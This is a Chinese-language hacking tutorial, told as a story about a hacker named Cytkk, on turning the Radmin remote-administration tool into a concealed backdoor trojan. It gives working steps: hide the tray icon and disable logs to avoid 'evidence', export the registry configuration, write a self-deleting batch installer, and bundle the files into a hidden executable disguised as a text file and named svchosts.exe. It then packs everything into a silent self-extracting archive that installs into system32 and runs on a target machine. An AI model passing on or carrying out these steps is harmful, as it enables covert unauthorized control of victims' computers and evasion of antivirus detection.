既然Radmin有著商業軟件的外衣,那自然殺毒軟件也就不會與它為難!但Radmin雖說不會被查殺,但卻有著先天的不足——服務端運行後在任務欄有圖標顯示,且服務端由3個文件組成(1個EXE文件,2個DLL文件),需要人工在服務端填寫口令才可以正常連接並操控,而且最令人頭痛的是服務端不具備自啟動功能。
想到這些,Cytkk眉頭微皺,但憑借著多年的技術敏銳感,壹款改造後的Radmin服務端形象出現在腦海裏,壹個完美的木馬後門:服務端由單壹EXE文件組成,運行後無明顯痕跡、無需人工幹涉即可自動填寫註冊信息到註冊表,添加自身到系統服務啟動項......Cytkk就這麽壹邊構想著,壹邊將鼠標移到了自己電腦的"開始"菜單上......
改造Radmin
1.Cytkk決定先去除Radmin在服務端運行後的任務欄標誌。進入Radmin"服務端設置"中的"設置參數"(見圖1),在"隱藏狀態欄圖標"前打上√,這樣原本在服務端運行後會在狀態欄有圖標的弊端就剔除了。
2.然後根據自己的需要,更改連接端口號,設置成不常用的1986端口。其它地方可不作修改(值得註意的是"日誌"選項,千萬不要因為錯選"保留記錄文件"從而留下"罪證"),點擊"確定"退出。
3.點選"設置密碼"來設置連接時的密碼******。
4.壹切設置妥當後,Cytkk先在自己機子上安裝了服務(因為Radmin工作原理的特殊性,配置信息並非記錄在服務端程序內,而是在相關的註冊表鍵值內)。待軟件提示成功安裝服務後,Cytkk打開註冊表編輯器,找到:HKEY_LOCAL_MACHINE\SYSTEM\RAdmin 鍵值,點擊"導出註冊表"並保存成單獨的r_server.reg文件,用記事本打開後,發現其中內容如下(根據設置的不同,參數會略有出入):
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:9c,ee,06,f2,9b,05,13,f8,6e,66,9a,06,00,24,5b,4b(這裏是連接密碼!其它信息不影響操作,所以不需要掌握)
"Port"=hex:c2,07,00,00(連接服務端時用的端口)
"Timeout"=hex:0a,00,00,00
************************
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00(01表示隱藏系統右下角的圖標,如改成00圖標就會被顯示)
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
5.最後Cytkk麻利地在桌面新建了壹個setup.bat批處理文件,在裏面添加如下腳本:
@echo off
***********************?(自動安裝Radmin服務端)
regedit.exe -s %SystemRoot%\system32\r_server.reg >nul (自動將r_server.reg內的配置信息導入目標機註冊表)
net start r_server >nul (啟動r_server服務端服務)
*******************************(刪除信息文件)
del %0
註意:文中代碼後括號內的內容為註釋,勿輸入。
超級捆綁
由於Radmin並不是"木馬型"監控軟件,所以它的服務端是由r_server.exe、raddrv.dll、AdmDll.dll三個文件組成,而壹般的"木馬"服務端通常只有壹個可執行文件。這是個比較麻煩的硬傷,但這難不倒Cytkk,他熟練地運行了壹款名為"超級捆綁"的軟件。
1.在界面點擊右邊白色圖標,將Radmin服務端的三個文件添加進文件列表,捆綁方式設置成"按文件捆綁方式",然後點擊右邊的"高級"按鈕進入詳細設置,在"常規"選項內(圖2),將圖標自定義為壹個文本文件以增加更好的隱蔽性,文件大小則采用默認。
2.隨後,Cytkk又將"屬性"中的"只讀"、"隱藏"和"系統"三項全部選中,這樣就使捆綁後的文件更具隱蔽和安全性。
3.Cytkk點擊"運行"標簽,出現捆綁程序運行設置,將文件分解運行目錄設置成 "在捆綁後的文件所在目錄中運行",窗口狀態則設為"隱藏窗口"。
4.他將"參數"頁面內的全部個性化設置選項前面的√取消。點擊"確定"退回上級窗口,最後設置好捆綁文件輸出路徑。為了增強隱蔽性,可以將捆綁後的執行文件更名,Cytkk將它命名為svchosts.exe。
5.點擊"合並"就完成了服務端的文件捆綁工作。現在的Radmin已經基本上從壹款商業化的遠程控制軟件變成了壹個不折不扣的木馬了。
善後
到此,Cytkk認為整個改造工作差不多完成了,馬上進行關鍵的收尾工作,即將編輯好的setup.bat以及最先導出的r_server.reg連同捆綁後的svchosts.exe這三個文件用WinRAR打包成自解壓程序。
Cytkk進行了如下設置:在"高級自釋放選項"中的"常規"選項內釋放路徑壹欄填入"%systemroot%\system32,在"釋放後運行"裏則需要把setup.bat(註意填寫文件擴展名)寫上,這樣在解壓後才會自動執行該批處理程序(如圖3)。在"模式"選項裏,把第壹個模式設置成"全部隱藏",覆蓋方式設置成"跳過現有文件",最後將"自釋放模塊"設置成DOS.SFX的DOS命令行RAR自釋放格式(因為取得系統CMD Shell後默認的Windows圖形控制臺不能正常工作)。點擊"確定"完成收尾工作。Cytkk最後檢查了壹下RAR自釋放包內的註釋(右邊灰色窗口內),看到自解壓腳本如下:
Path=%systemroot%\system32
**************
Silent=1
Overwrite=2
所有工作已經完成,Cytkk滿意地笑了笑,將制作好的打包程序上傳到目標計算機運行,隨後在自己機子上打開Radmin的客戶端,輸入目標機IP→連接→輸入密碼